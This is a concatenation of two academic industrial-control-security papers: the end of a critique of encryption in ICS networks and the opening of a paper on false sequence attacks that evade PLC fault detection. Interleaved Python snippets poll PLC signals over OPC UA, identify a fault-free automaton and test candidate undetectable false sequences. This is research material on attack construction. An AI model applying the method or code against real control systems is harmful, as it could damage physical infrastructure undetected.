Disk-wiping Shamoon virus knocks out computers at Qatari gas firm RasGas [1] | x | ? | 2012 | Petroleum
Gas Company Virus Infection from USB [1] | x | ? | 2012 | Petroleum
Auto Manufacturer Suffers Data Breach from Virus [1] | ? | ? | 2012 | Automotive
Process Control Network Infected with a Virus from Laptop [1] | x | ? | 2012 | Petroleum
Industrial Control System Hacked Using Backdoor Posted Online [1], [15] | x | o f,c | 2012 | Other
South Houston Water Treatment Plant Hack [1] | x | ? | 2011 | Water/Waste
Steel plant infected with Conficker Worm [1] | x | o f,c | 2011 | Metals
Brute-Force Attack on Texas Electricity Provider [1] | x | o f | 2010 | Power/utility

The second column of Table I summarizes the evaluation of the different attacks. For the three attacks studied in detail, encryption did not help (indicated by "X" in the table). The same conclusion can be reached for the others, based on a general description of the attack (indicated by "x"). In one case (indicated by "?") we did not have enough information on the attack to evaluate whether encryption would have helped. The table clearly validates our first thesis: encryption is not able to stop most of these attacks.

VII. THREATS OF ENCRYPTION TO SECURITY
In this section we evaluate our second thesis: encryption can have negative consequences for security. Encryption decreases the visibility of data, not only for potential attackers, but also for security tools trying to evaluate this data, such as network monitoring solutions. With respect to monitoring we distinguish two main categories: flow-based solutions, e.g. [28], that only consider the amounts of communication and the endpoints involved, and content-based solutions, e.g. [13], [35], that also consider the actual content of the communications. Flow-based solutions may still work if the communication is encrypted, but this depends on the exact approach and the method of encryption. IPsec tunnel mode, for example, would prevent (some forms of) flow-based analysis on the link it is applied on. Clearly, content-based solutions are prevented from fully analysing data that is encrypted with keys the monitoring system does not have.
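The difference between flow-based and content-based visibility is easy to see on a cleartext Modbus/TCP frame: the fields a content-based monitor needs sit in the first bytes of the TCP payload, and they disappear once the payload is enciphered. The parser below is a minimal illustration (MBAP header plus function code); the example frame and the "suspicious function" list are hypothetical, not taken from any monitoring product discussed in this paper.

```python
import struct

WRITE_FUNCTIONS = {5, 6, 15, 16}     # coil/register write commands a monitor might want to flag

def inspect_modbus(payload: bytes):
    """Content-based check on a cleartext Modbus/TCP payload (MBAP header + PDU)."""
    if len(payload) < 8:
        return "too short for Modbus/TCP"
    trans_id, proto_id, length, unit_id, function = struct.unpack(">HHHBB", payload[:8])
    if proto_id != 0:
        return "not Modbus/TCP"
    verdict = "write command" if function in WRITE_FUNCTIONS else "read/other"
    return f"unit {unit_id}, function {function}: {verdict}"

# Cleartext frame: full visibility. The same bytes inside a TLS record are opaque,
# leaving only flow-level features (endpoints, timing, sizes) for the monitor.
print(inspect_modbus(bytes.fromhex("000100000006110600010003")))
```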
Wefurther indicate whether ow-based (f) and content-based (c)monitoring is involved. Several attacks (marked f,c) can be detected by ow-based monitoring but require content-basedapproaches to identify what type of attack is happening. We have several cases where we did not nd any claims that the attack is detectable with a given approach, and theattacks descriptions are not suf cient to determine whetherknown approaches would work. As such, there are severalcases that are indicated as unknown (?). Still, several attacksrequire content-based approaches to identify or even to detectthem at all. This already validates our second thesis; in manycases encryption hinders other security solutions and thusmay actually decrease the security of the system. VIII. T HREA TS OF ENCRYPTION TO SYSTEM OPERA TIONS In this section we evaluate our third thesis: Encryption increases troubleshooting and recovery costs. To this end we consider several causes that can motivate troubleshooting. Network congestion. Upon slow operator terminal updates one would check the LAN for overload [9, Sec. 8.2]. Quoting from [31]: over the past few months, the net- work seemed sluggish , which the automation engineers andSMEs attributed to older, legacy equipment. [...] With the co-operation of [company], we set up a Switched Port Analyzer (SPAN) port and deployed a passive network analyzer to collect and analyze the traf c. If the traf c was encrypted, this common troubleshooting task would have been hindered. A possible cause for congestion is a device ooding the network, e.g. due to miscon guration or a virus attack. Anexample of the latter was the Con cker worm infecting asteel plant in 2011 [1]: The virus ooded the network withunwanted packets and caused an instability in the communi-cations between PLCs and supervisory stations and freezing most of the supervisory systems. While the presence of the aw is clear, a full diagnosis requires looking at the content of the communication and possibly listening from differentlocations, to identify the source of the anomalous traf c. Non-healthy devices. Upon missing updates, alarms or un- expected behaviour one would evaluate the health of related components. After basic (hardware) checks, [9, Sec. 6.10]recommends checking an individual component s health by 5IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 293Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. using a protocol analyser to look for errors or inconsistencies in its traf c. Components failing health tests should be read- ily replaced: An effective SCADA system should include theproper complement of spare components that the operator can swap out easily for troubleshooting purposes. 2The lower visibility of data induced by encryption can negativelyaffect these health checks, and key management issues canimpact prompt replacement of components. Third-party network access. A common SCADA practice is to hire an external party to evaluate the system, either as partof a health check or risk assessment [31], or for emergencytroubleshooting. As part of this, the external party wouldplug a (possibly unauthenticated) external device (laptop) at different points of the communication network, and evaluate the systems and communication visible there. 
As even au-thenticated devices do not normally get the decryption keysfor sessions between other devices, encryption might hinderthis practice by limiting what communications are visible tothe external device. The examples above show that encryption increases trou- bleshooting complexity by making analysing problems andreplacing components more involved. The exact impact maydiffer per scenario; a more formal general statement wouldrequire going into SCADA troubleshooting and recoverycommon practices in detail. Still, we believe the issuesobserved above are representative and con rm our thesis thatencryption increase troubleshooting and recovery costs. IX. C ONCLUSIONS This paper is meant as a critical analysis of the pro s and con s of network encryption for ICS. We observedthree general principles: First, in the majority of cases,the introduction of encryption does not yield extra security.Second, encryption can actually have negative consequences for security by hindering other security mechanisms such as NIDS. Third, encryption can raise the costs of trou-bleshooting and recovery considerably. Of course, beforedrawing conclusions one has to consider the criticality of thetarget ICS, as well as its speci c requirements: for example,systems dealing with user data such as advanced meteringinfrastructures (AMI) will need stronger con dentiality. Cur-rently, though, in typical ICS scenarios one needs to achieveauthentication and integrity of the communication (whoseimplementation is easier and has less impact on the generalsystem), rather than the con dentiality offered by encryption.We cannot predict any new attacks or future changes to thethreat landscape that might change this priority. We do not advocate for completely discarding encryp- tion for ICS network traf c, but assert that blanket use of encryption on SCADA networks can prove both costlyand detrimental to security. Instead, careful consideration ofwhat encryption is actually good for, and at what cost, isneeded both for standardization efforts, and SCADA system deployment. 2www.tpomag.com/online exclusives/2013/07/scada troubleshooting tips help systems runsmoothlyREFERENCES [1] RISI Online Incident Database. http://www.risidata.com/Database. [2] APT1: Exposing One of China s Cyber Espionage Unit. Technical report, Mandiant, 2013. [3] Cyberespionage attacks against energy suppliers, version 1.21. Tech- nical report, Symantec, 2014. [4] Energetic Bear - Crouching Yeti. Technical report, Kaspersky, 2014. [5] Annual Threat Report. Technical report, Dell, 2015. [6] IEC 62351: OPC Uni ed Architecture . International Electrotechnical Commission, 2015. [7] Year in Review. Technical report, NCCIC/ICS-CERT, 2015.[8] IEC 62351 (2016-09): Power systems management and associated in- formation exchange - Data and communications security . International Electrotechnical Commission, 2016. [9] David Bailey and Edwin Wright. Practical SCADA for industry . Newnes, 2003. [10] Stewart Baker, Shaun Waterman, and George Ivanov. In The Cross re. Technical report, McAfee, 2010. [11] Manuel Cheminod, Luca Durante, and Adriano V alenzano. Review of security issues in industrial networks. IEEE Transactions on Industrial Informatics , 9(1):277 293, 2013. [12] Tim Conway, Robert M. Lee, and Michael J. Assante. Analysis of the cyber attack on the Ukrainian power grid. Defense use case. Technical report, SANS ICS, 2016. [13] E. Costante, J.I. den Hartog, M Petkovi c, S. Etalle, and M. Pech- enizkiy. 
Hunting the unknown - white-box database leakage detection. In DBSEC, LNCS 8566, pages 243-259, 2014.
[14] Nicolas Falliere, Liam O Murchu, and Eric Chien. W32.Stuxnet dossier. White paper, Symantec Corp., Security Response, 5(6), 2011.
[15] FBI. Vulnerabilities in Tridium Niagara Framework Result in Unauthorized Access to a New Jersey Company's ICS, 2012.
[16] ICS-CERT. Advisory ICSA-10-090-01: Mariposa Botnet, 2010.
[17] S. Kent. IP Authentication Header. RFC 4302, 2005.
[18] S. Kent. IP Encapsulating Security Payload (ESP). RFC 4303, 2005.
[19] S. Kent and K. Seo. Security Architecture for the Internet Protocol. RFC 4301, 2005.
[20] HyungJun Kim. Security and vulnerability of SCADA systems over IP-based wireless sensor networks. International Journal of Distributed Sensor Networks, 2012.
[21] Joel Langill. Defending Against the Dragonfly Cyber Security Attacks. Technical report, Belden, 2014.
[22] Joel Langill, Emmanuele Zambon, and Daniel Trivellato. Cyberespionage campaign hits energy companies. Technical report, Security Matters, 2014.
[23] Ralph Langner. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy, 9(3):49-51, 2011.
[24] Ralph Langner. To Kill a Centrifuge. Technical report, Langner Group, 2013.
[25] David McMillen. Security attacks on industrial control systems. Technical report, IBM, 2017.
[26] Nell Nelson. The Impact of Dragonfly Malware on Industrial Control Systems. Technical report, SANS ICS, 2016.
[27] Adam Slagell. Thinking critically about computer security trade-offs. Skeptical Inquirer, 2016.
[28] A. Sperotto, G. Schaffrath, R. Sadre, C. Morariu, A. Pras, and B. Stiller. An overview of IP flow-based intrusion detection. IEEE Communications Surveys and Tutorials, 12(3):343-356, 2010.
[29] Keith Stouffer, Suzanne Lightman, Victoria Pillitteri, Marshall Abrams, and Adam Hahn. Guide to industrial control systems (ICS) security, volume 800. NIST, 2014.
[30] Verizon RISK Team. Data breach digest, 2016.
[31] Verizon RISK Team. Data breach digest, 2017.
[32] Daniel Trivellato and Dennis Murphy. Lights out! Who's next? Technical report, Security Matters, 2016.
[33] Yongge Wang. sSCADA: securing SCADA infrastructure communications. Int. J. Communication Networks and Distributed Systems, 6(1):59, 2011.
[34] Wonderware Invensys Systems. Securing Industrial Control Systems, 1.4 edition, 2007.
[35] Omer Yuksel, Jerry den Hartog, and Sandro Etalle. Towards useful anomaly detection for back office networks. In ICISS, LNCS 10063, pages 509-520. Springer International Publishing, 2016.
[36] Bonnie Zhu, Anthony Joseph, and Shankar Sastry. A taxonomy of cyber attacks on SCADA systems. In iThings/CPSCom, pages 380-388. IEEE, 2011.
Encryption in ICS networks: a Blessing or a Curse?
Davide Fauri1, Bart de Wijs2, Jerry den Hartog1, Elisa Costante3, Emmanuele Zambon3 and Sandro Etalle1,3
1Technische Universiteit Eindhoven {d.fauri, j.d.hartog, s.etalle}@tue.nl, 2ABB Group [email protected], [email protected], [email protected]
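To make the paper's distinction between flow-based (f) and content-based (c) monitoring concrete, the short Python sketch below contrasts the two views on the same hypothetical traffic: the flow-level check only sees who talks to whom and how much, while the content-level check reads an unencrypted Modbus function code to say what is actually happening. The packet records, the threshold and the function-code whitelist are illustrative assumptions, not taken from the paper; the point is simply that the second check is exactly the kind of inspection that payload encryption rules out.

```python
from collections import Counter

# Hypothetical, pre-parsed packet records; on an encrypted network only the
# flow-level fields (src, dst, len) would remain visible to a passive monitor.
packets = [
    {"src": "10.0.0.5", "dst": "10.0.0.9", "len": 64, "modbus_fc": 3},   # read holding registers
    {"src": "10.0.0.5", "dst": "10.0.0.9", "len": 64, "modbus_fc": 3},
    {"src": "10.0.0.7", "dst": "10.0.0.9", "len": 72, "modbus_fc": 16},  # write multiple registers
]

PKTS_PER_SRC_THRESHOLD = 1000        # illustrative flooding threshold
ALLOWED_FUNCTION_CODES = {3, 4}      # illustrative whitelist: read-only operations

def flow_based_alerts(pkts):
    """Flow-based view: only who talks to whom and how much (still works on encrypted traffic)."""
    per_src = Counter(p["src"] for p in pkts)
    return [f"possible flooding from {src}" for src, n in per_src.items()
            if n > PKTS_PER_SRC_THRESHOLD]

def content_based_alerts(pkts):
    """Content-based view: needs cleartext payloads to say *what* is happening."""
    return [f"unexpected write (fc={p['modbus_fc']}) from {p['src']}"
            for p in pkts if p["modbus_fc"] not in ALLOWED_FUNCTION_CODES]

print(flow_based_alerts(packets))     # []
print(content_based_alerts(packets))  # ["unexpected write (fc=16) from 10.0.0.7"]
```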
Construction_of_false_sequence_attack_against_PLC_based_power_control_system.pdf
It is essential to ensure accurate sensor measurements to safely regulate physical processes in power control systems. Traditional false data injection (FDI) attacks against control systems mainly require the attackers to obtain the optimal malicious inputs. Different from traditional FDI attacks, we present a false sequence attack that can disable the fault detection of Programmable Logic Controllers (PLCs) with only partial information about the victim system. Our attack formulation is to identify a discrete event model from fault-free I/O traces collected from compromised PLCs, and to find, from the identified model, undetectable false sequences that are then injected into compromised sensors as the desired attacks. A representative industrial simulation shows that we can construct the false sequence attack against a control system equipped with fault detection. Key Words: power control system, false sequence attack, false data injection, discrete event model, fault detection
Construction of False Sequence Attack Against PLC based Power Control System Min Xiao, Jing Wu , Chengnian Long, Shaoyuan Li Department of Automation, Shanghai Jiao Tong University and Key Laboratory of System Control and Information Processing, Ministry of Education, Shanghai 200240, P . R. China E-mail: [email protected] 1 Introduction Control systems as the fundamental components of cyber- physical critical infrastructures have been widely used inpower grids. On account of their crucial role in modern in-dustrial society, they are becoming highly vulnerable targetsfor adversaries causing malicious damage. Traditional safetyprotection is mostly through cyber security solutions and ef- cient to prevent the virus invasion into the industrial net-work. However, recent research has demonstrated that nocontroller code with existential threat is allowed to be exe-cuted after it passed physical safety checks with the TrustedSafety V eri er (TSV) [1]. Moreover, intruding the host sys-tem like Stuxnet malware [2, 3] is very challenging job inview of well-protected control networks. Therefore, moreand more interests have been paid to traditional false data in-jection (FDI) attacks, which do not require to break throughhardened industrial control network to upload the maliciouspayload in the power control system. In recent years, more and more security researches have been focused on FDI attack in power grids. From the viewof system s topology, Liu et al. [4] announced that false datainjection attacks could introduce arbitrary errors into certainstate variables which mislead the state estimation processwithout being detected by bad measurement detection. Yanget al. [5] implemented FDI attack on various IEEE standardbus systems, and proved its advantage over a baseline strat-egy of random selections. However, the above FDI attacksis feasible with the assumption that whole system s con g-uration or topology is available and a great number of com-promised sensors of large power system is accessible, whichare hard to implement during the actual operation. From theview of cyber-physical platforms, Mclaughlin et al. [6] pro-posed FDI attack against PLC through the controller s be-havioral model to search the optimal input vector to destroythe control system. Pang et al. [7] presented stealthy falsedata attacks, which can thoroughly destroy the normal op- *This work is supported by National Natural Science Foundation of China (Grant Nos. 61172064, 61473184).eration of the output track control systems. Both of them ignore mature solution of fault detection [8 10], which are applied to the intelligent controller such as PLC. In this paper, we present false sequence attack against PLCs, which can disable the fault detection in PLCs. Onlyfew compromised sensors and suf cient signal sequence(I/O vectors) monitored between PLC and actual plant are re-quired to be controlled during the construction of the attack.Moreover, we analyze and model the collected fault-free I/Otraces of compromised PLCs to nd false sequences, whichcan be injected into inputs of remote sensors to damage thecontrol system and cannot be detected by fault detection. Itis noteworthy that under the condition of existing fault detec-tion, we take advantage of fault-tolerance rate kto construct false sequences based on identi ed model. We organize the rest of this paper as follows: in Section 2, we give the formulation of our false sequence attack. 
In sec-tion 3, we present the modeling of PLC-based control sys-tem and construction of false sequence attack. In section 4,we provide a representative industrial simulation and obtainsome simulation results. In Section 5, we will draw someconclusions. 2 Problem Formulation Considering the threat model described in Fig. 1, attack- ers only need to access and confuse the remote less-protectedsensors of control system that are distributed geographicallyacross the country. Then, the attack can indirectly per-form malicious damage to human-machine interface (HMI)whose inputs come from remote sensors of remote termi-nal units (RTUs) or PLCs through the heterogeneous com-munication networks. To prevent the anomalies caused byphysical faults, every smart controller deploys the fault de-tection mechanism. To make sure the feasibility of our at-tack, we assume that the attackers get hold of the high-levelinfrastructural con guration, such as connecting relation-ship between the sensors/actuators and RTUs or PLCs in-puts/outputs, which is not hard to access in practice. With theabove knowledge the attackers construct the false sequenceattack to inject into compromised sensors which send mis-guided measurements to the PLC.Proceedings of the 35th Chinese Control ConferenceJul y 27-29, 2016, Chen gdu, China 10090Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Figure 1: The threat model for false sequence attack However, the challenge is how to construct the attack that makes PLCs perform malicious actions with the mature faultdetection deployed in the control system. One of the maintask for false sequence attack is to analyze and disable thefault detection. False sequences attack is essentially to ex-ploit the vulnerability of fault detection principle that wasmerely designed to solve the random fault problem, andsend undetectable and corrupted measurements to the PLCthrough compromised remote sensors. Fig. 2 shows how theattack is constructed. We assume the adversaries have accessto signal or stack traces exchanged between PLC controllerand plant. With the inputs and outputs vector databases, weidentify the discrete event model that is fault-free similarly to modeling approach of fault detection. Finally, we searched for all the sets of undetectable false sequences that cause themalicious system behavior from identi ed model. The spe-ci c search algorithm is discussed in next section. Note thatobtaining appropriate length of false sequences is crucial inwhole traversal process. Figure 2: Construction of the false sequence attack 3 Modeling and construction of false sequence at- tack We require a formal description to identify m-behaviors for BEHm Ident and to observe m-behaviors for BEHm Obs, which is brought in to quantify the exceeding m-behaviors generated by the identi ed model. The identi cation goalis to minimize the amount of exceeding m-behaviors for a given value of identi cation parameter m. Rather, It is ob- vious that BEH m Ident is equal to BEHm Obs. Then we perform the false sequences on the basic of identi ed model. 3.1 Data collection and formal de nition of observed behavior We can collect sampled data between PLC and controller through capturing the signals after they have been gatheredby the PLC controller [8]. Fig. 3 shows the widely adapted method to capture I/O vector sequences from PLC that canbe used to monitor the compromised data by attacker. 
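As a rough illustration of the data-collection step described in Section 3.1, the sketch below polls a set of PLC signals through an OPC UA client and appends a new I/O vector to the identification database only when at least one signal has changed, matching the convention that two successive vectors must differ. The paper only states that OPC communication is used, so the choice of the python-opcua library, the endpoint address and the node identifiers are assumptions made for this example.

```python
import time
from opcua import Client  # python-opcua; endpoint and node ids below are illustrative

ENDPOINT = "opc.tcp://192.168.0.10:4840"            # hypothetical PLC/OPC server
NODE_IDS = ["ns=2;s=I1", "ns=2;s=I2", "ns=2;s=O1"]  # hypothetical boolean input/output signals

def collect_io_sequence(n_samples=1000, period_s=0.05):
    """Record a sequence of I/O vectors; keep a vector only if it differs from the last one."""
    client = Client(ENDPOINT)
    client.connect()
    try:
        nodes = [client.get_node(nid) for nid in NODE_IDS]
        sequence, last = [], None
        for _ in range(n_samples):
            vector = tuple(int(bool(n.get_value())) for n in nodes)
            if vector != last:            # u(t) != u(t+1): only a change creates a new vector
                sequence.append(vector)
                last = vector
            time.sleep(period_s)
        return sequence
    finally:
        client.disconnect()
```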
We collect the data to form the identification database at the end of each I/O vector cycle through the OPC communication mode.

Figure 3: PLC cycle and data collection

After implementing the collection of data, we need to define the observed input/output (I/O) sequences, language and behaviors of the collected data. Before we start, we introduce the following definitions.

Definition 1: The set of observed I/O sequences of the collected data, with r inputs and s outputs, is denoted as

Σ = (σ_1, ..., σ_p)   (1)

where σ_i = (u_i(1), u_i(2), ..., u_i(|u_i|)), u_i(j) is the j-th I/O vector of the i-th sequence, and u = (I_1, ..., I_r, O_1, ..., O_s) = (IO_1, ..., IO_m) with m = r + s.

We assume that for two successive I/O vectors u(t) ≠ u(t+1) holds, so that an I/O vector is considered a new one if and only if at least one of its I/O signals has changed.

Definition 2: The observed language set and behavior of the collected data: the observed language of length q is the set of observed I/O vector sequences of length q,

L^q_Obs = ⋃_i ( ⋃_{t=1}^{|σ_i|−q+1} (u_i(t), u_i(t+1), ..., u_i(t+q−1)) )

With the observed language set, the observed behaviors of length n are defined as

BEH^n_Obs = ⋃_{i=1}^{n} L^i_Obs   (2)

3.2 Model identification

3.2.1 Model class

The aim of identification is to make sure that the identified m-behaviors BEH^m_Ident are equal to the observed m-behaviors BEH^m_Obs, where m can take any admissible value. Briefly, the identified model reproduces the language of the PLC-based control system. The considered system is the coupled system of a well-programmed controller and the physical plant, which is regarded as non-deterministic. Hence, we adopt the Non-Deterministic Autonomous Automaton with Output (NDAAO) [10], which is suited to model our system.

Definition 3: A non-deterministic autonomous automaton with output (NDAAO) is a five-tuple NDAAO = (X, Ω, f_nd, λ, x_0) with

X = {x_0, ..., x_{|X|−1}}, the finite set of states;
Ω = {ω_1, ..., ω_{|Ω|}}, the finite set of output symbols;
f_nd: X → 2^X, the non-deterministic transition function;
λ: X → Ω, the output function associating each state with an output symbol;
x_0, the initial state.

The NDAAO can be represented by a digraph G = (V, E). The vertex set of G is the set of all states of the NDAAO, V(G) = X. The edge set of G is given by the transition function f_nd:

E(G) = {(x_i, x_j) ∈ X × X : x_j ∈ f_nd(x_i)}

With each node associated with the output λ(x_i) of the corresponding state x_i, Fig. 4 shows a simple example of the graphical representation of an NDAAO.

Figure 4: Graphical representation of a NDAAO

Definition 4: Word set and behavior of the NDAAO: the set of n-length words generated by the NDAAO starting in x_i is

W^n_{x_i} = { w ∈ Ω^n | w = (λ(x(1)), ..., λ(x(n))) : ∃(x(1), ..., x(n)) : x(1) = x_i ∈ X, and ∀ 1 ≤ t ≤ n−1, x(t+1) ∈ f_nd(x(t)) }   (3)

Then the set of words of length n generated by the NDAAO is

W^n(NDAAO) = ⋃_{x_i ∈ X} W^n_{x_i}   (4)

With this description of the word set, we can obtain the identified n-behavior of the NDAAO, that is

BEH^n_Ident = ⋃_{p=1}^{n} W^p(NDAAO)   (5)

Definition 5: An identified event vector e(j) is the variation between two adjacent identified output vectors λ(j) and λ(j+1) of the NDAAO; it is formulated as e(j) = λ(j+1) − λ(j). An input event vector I(e(j)) is defined over the two adjacent input parts I(j), I(j+1) of the identified output vectors, and an output event vector O(e(j)) is defined analogously.
The specific formulation is

e(j) = ⋃_{l=1}^{m} { I_l^1 or O_l^1, if IO_l(j+1) − IO_l(j) = 1;  I_l^0 or O_l^0, if IO_l(j+1) − IO_l(j) = −1;  ε, if IO_l(j+1) − IO_l(j) = 0 }   (6)

where I_l^1 (O_l^1) denotes a rising edge and I_l^0 (O_l^0) a falling edge of the l-th input (output), and ε denotes the absence of an event. Considering an I/O vector sequence involving two inputs and one output, we have

Σ = (A, B, C) = ((0,1,0), (1,1,0), (1,0,1))

This sequence can be represented as A --{I_1^1}--> B --{I_2^0, O_1^1}--> C.

3.2.2 Identification algorithm

We present an identification algorithm generating the NDAAO introduced in the previous section. We define an identification parameter k that determines the length of the I/O vector sequences used to create new states. The parameter k serves to produce n-behaviors of the NDAAO that are exactly equal to the n-behaviors generated from the observed vectors; the produced NDAAO is called n-complete. The construction of the NDAAO is divided into three steps. Firstly, we transform the observed sequences into sequences of words of length k, creating k−1 dummy states at the beginning so that the first words are consistent with the others; Part 1 of Algorithm 1 shows this transformation of the observed sequences. Secondly, we perform the NDAAO identification: the states of the NDAAO are associated with words of length k and the transition function is derived from words of length k+1; Part 2 of Algorithm 1 shows the identification of the NDAAO. Finally, we merge equivalent states to reduce the state space: for any two distinct states x_i and x_j, if they are associated with the same output and have the same set of successors, they can be merged into one state. We visualize the model by drawing the graph defined by the states and the transition function of the NDAAO; the specific procedure is shown in Part 3 of Algorithm 1.

Example 1. Consider three sequences collected from the fault-free system: σ_1 = (A,B,C,D,E,A), σ_2 = (A,B,D,C,D,E,A), σ_3 = (A,D,B,C,D,F,E,A). The capital letters represent different I/O vectors. Here we choose the identification parameter k = 2. After the transformation of the sequences, we obtain

Σ^{k=2}_1 = (AA, AB, BC, CD, DE, EA)
Σ^{k=2}_2 = (AA, AB, BD, DC, CD, DE, EA)
Σ^{k=2}_3 = (AA, AD, DB, BC, CD, DF, FE, EA)

and

Σ^{k=3}_1 = (AAA, AAB, ABC, BCD, CDE, DEA)
Σ^{k=3}_2 = (AAA, AAB, ABD, BDC, DCD, CDE, DEA)
Σ^{k=3}_3 = (AAA, AAD, ADB, DBC, BCD, CDF, DFE, FEA)

After obtaining Σ^{k=2} and Σ^{k=3}, we derive the states from Σ^{k=2} and the transition function from Σ^{k=3} according to Part 2 of Algorithm 1. The corresponding graph is shown in Fig. 5.
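A minimal Python sketch of the transformation used in Example 1: it pads each observed sequence, slides a window of length k to build the k-length words that become NDAAO states, and reads candidate transitions off consecutive words. It is a simplified reading of Parts 1 and 2 of Algorithm 1 below (state merging is omitted), not the authors' implementation.

```python
def k_words(sequence, k):
    """Pad with k-1 copies of the first vector, then slide a window of length k."""
    padded = [sequence[0]] * (k - 1) + list(sequence)
    return ["".join(padded[i:i + k]) for i in range(len(sequence))]

def identify_ndaao(sequences, k):
    """States are k-length words; transitions are read off consecutive words."""
    states, transitions = set(), {}
    for seq in sequences:
        words = k_words(seq, k)
        states.update(words)
        for a, b in zip(words, words[1:]):
            transitions.setdefault(a, set()).add(b)
    output = {w: w[-1] for w in states}   # lambda(x): last symbol of the word
    return states, transitions, output

# Example 1 from the paper: three fault-free sequences, k = 2
sigma = ["ABCDEA", "ABDCDEA", "ADBCDFEA"]
states, trans, lam = identify_ndaao(sigma, k=2)
print(sorted(states))       # ['AA', 'AB', 'AD', 'BC', 'BD', 'CD', 'DB', 'DC', 'DE', 'DF', 'EA', 'FE']
print(sorted(trans["CD"]))  # ['DE', 'DF']
```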
Algorithm 1: Construction of the NDAAO
Input: observed I/O sequences Σ and identification parameter k
Output: the NDAAO and the digraph G = (V, E)

// Part 1: transformation of the observed sequences
1: for each σ_i ∈ Σ do
2:   if u_i(1) ≠ u_i(|σ_i|) then
3:     remove σ_i from Σ;
4:     return;
5:   else
6:     φ_i(t) = u_i(1) for 1 ≤ t ≤ k−1, and φ_i(t) = u_i(t−k+1) for k ≤ t ≤ k+|σ_i|−1
7:     for m = 1 to |σ_i| do
8:       w_i(m) = (φ_i(m), ..., φ_i(m+k−1));
9:     end for
10:    Σ^k_i = (w_i(1), ..., w_i(|σ_i|));
11:  end if
12: end for
13: Σ^k = ⋃_{i=1}^{|Σ|} Σ^k_i;

// Part 2: identification of the NDAAO
14: initialize the states X = ∅, the transition function f_nd(x_0) = ∅, the output function λ = ∅, the initial state x_0 = Σ^k[0][0], the nodes V = ∅ and the edges E = ∅;
15: for all w ∈ Σ^k do
16:   for all x ∈ w do
17:     X ← X ∪ {x};
18:     λ(x) = x(|x|);
19:   end for
20: end for
21: for all w ∈ Σ^{k+1} do
22:   for all v ∈ w do
23:     x ← v[1 .. k];
24:     f_nd(x) ← f_nd(x) ∪ {v[2 .. |v|]};
25:   end for
26: end for

// Part 3: reduction of the state space and graphical representation
27: for all x_i, x_j ∈ X with i ≠ j do
28:   if λ(x_i) = λ(x_j) and f_nd(x_i) = f_nd(x_j) then
29:     merge x_i and x_j: delete x_i (x_j) from X and replace f_nd(x) = x_i (x_j) with f_nd(x_pre) = x_j (x_i), where x_pre is the predecessor of x_i (x_j);
30:   end if
31: end for
32: V ← V ∪ X;
33: E ← E ∪ (x, f_nd(x));
34: draw(G(V, E));

Figure 5: Identified NDAAO after the second step of the identification algorithm

The primary identified model has redundant states and edges compared to the original model; hence we reduce the state space according to Part 3 of Algorithm 1 to simplify the primary model. For example, if we merge the state DB with the state AB, the state BA with the state EA and the state BC with the state DC, and replace each k-length word with a state x_i ∈ X, we obtain the simplified NDAAO in Fig. 6.

Figure 6: Finally identified NDAAO after merging equivalent states

3.3 Construction of False Sequence Attack

After we have identified the fault-free NDAAO, we can take advantage of the principle of fault detection to construct undetectable false sequences. Fault detection determines whether every currently observed I/O vector accords with the output of the identified NDAAO: if it does, the current vector is considered legal; otherwise, a fault alarm is raised. In our attack approach, we construct false sequences that not only produce the same outputs as the identified model, which ensures the attack cannot be detected, but also cause malicious system behavior through an appropriate choice of the length of the false sequences and of their false actuating logic. The formal description of the false sequences of length n starting with x_i is defined as follows:

S^n_{x_i} = { s ∈ Ω^n | s = (λ(x(1)), ..., λ(x(n))) ∧ s ∉ L^n_Obs : [∃(x(1), ..., x(n)) : x(1) = x_i ∈ X, and ∀ 1 ≤ t ≤ n−1, x(t+1) ∈ f_nd(x(t))] }   (7)

The definition of S^n_{x_i} constructs the sequences of length n that are generated by the identified NDAAO yet differ from every sequence of observed I/O vectors. Therefore, the defined false sequences can act as potentially harmful intrusions when injected into compromised sensors. Since the reduced NDAAO is (k+1)-complete, the following holds:

∀ m ≤ k+1,  BEH^m_Obs = BEH^m_Ident   (8)

According to the above, only the sequences in S^n_{x_i} whose length is not less than k+2 can serve as false sequences.
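The membership test behind definition (7) can be phrased directly in code: a candidate word is a usable false sequence if it is at least k+2 symbols long, can be produced by some state walk of the identified NDAAO, and never occurs in the observed, fault-free traces. The sketch below is a brute-force illustration of that test on a hand-made toy automaton; it is not the authors' IncSearching procedure, which is given as Algorithm 2 further down.

```python
def generated_by_ndaao(word, trans, lam):
    """True if some state walk of the identified NDAAO outputs exactly `word`."""
    frontier = {s for s in lam if lam[s] == word[0]}
    for symbol in word[1:]:
        frontier = {n for s in frontier for n in trans.get(s, ()) if lam[n] == symbol}
        if not frontier:
            return False
    return True

def in_observed_language(word, sequences):
    """True if `word` occurs as a contiguous subsequence of a fault-free trace."""
    return any(word in seq for seq in sequences)

def is_false_sequence(word, trans, lam, sequences, k):
    """Definition (7) plus the length bound: generable, never observed, length >= k+2."""
    return (len(word) >= k + 2
            and generated_by_ndaao(word, trans, lam)
            and not in_observed_language(word, sequences))

# Toy automaton, hand-made for illustration only (not the paper's Fig. 6);
# states are named after their output symbol for readability.
lam = {"a1": "A", "b1": "B", "c1": "C", "d1": "D"}
trans = {"a1": {"b1", "c1"}, "b1": {"c1"}, "c1": {"d1"}, "d1": {"a1"}}
observed = ["ABCDA", "ACDA"]
print(is_false_sequence("ABCD", trans, lam, observed, k=2))    # False: it was observed
print(is_false_sequence("ACDABC", trans, lam, observed, k=2))  # True: generable but never observed
```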
